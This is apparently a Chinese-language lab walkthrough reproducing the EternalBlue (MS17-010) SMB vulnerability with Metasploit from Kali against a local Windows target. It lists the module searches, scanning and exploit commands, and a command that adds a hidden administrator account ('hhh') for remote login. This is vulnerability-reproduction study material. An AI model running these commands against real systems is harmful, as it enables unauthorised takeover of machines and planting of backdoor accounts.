前言——
需要一台有ms17010 和一台kali
ps:需要在同一局域网内,可以相互ping通
漏洞简介:
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
复现过程:
1,在kali下,如果不是root权限,需要提权,如果是,跳过这一步
命令:sudo su
sudo -i 这两个都可以
2, 启动msf:msfconsole
ps:输入命令后的图像随机,不必纠结这一点
3,搜索模块: search ms17_010
ps:关于以上模块,简单解释一下
0 auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务
1 auxiliary/scanner/smb/smb_ms17_010 //扫描模块,扫描目标主机是否存在永恒之蓝漏洞
2 exploit/windows/smb/ms17_010_eternalblue //攻击模块
3 exploit/windows/smb/ms17_010_eternalblue_win8 //攻击模块,针对win8(个人猜测)
4 exploit/windows/smb/ms17_010_psexec //可以理解成没得用
4,建立监听器:use exploit/multi/handler
5,使用扫描模块:use auxiliary/scanner/smb/smb_ms17_010
ps:也可以使用前面的序号,这里为了偷懒,就使用前面的序号了:use 1
show options //查看
ps:required中显示yes的需要补充完整
所以使用命令补充ip地址:set RHOSTS 192.168.3.135(目标ip)
6,exploit //扫描是否有漏洞
ps:run也可以(这里就不展示了,但是建议用exploit)
扫描查看是否存在永恒之蓝这个漏洞,当然这里这里肯定是有的(没有的话就可以换方法了)
7,使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue(use 2)
查看模块(show options)
设置ip(set RHOSTS 192.168.3.135)
8,尝试攻击:exploit
人类的悲欢并不相同,永恒蓝屏(反正我用这个是没有成功的,本来还想要测试一下有杀软的情况,但是现实不允许啊)
参考有杀软的教程: javascript:void(0)
另:如果成功,之后的步骤及一些命令
如果成功,会现实win
蓝屏....
9,在刚刚exploit命令无法成功后,使用模块:use auxiliary/admin/smb/ms17_010_command (use 0)
一样的步骤,查看,设置(注意:yes的都要添加,不要漏掉)
10,exploit运行成功后,可以看到用户已经加进去了
11,加入后可以通过远程连接,拿到shell
ps:存在问题:不允许交互式登录
更改权限:set COMMAND net localgroup administrators hhh /add
成功添加用户
成功上线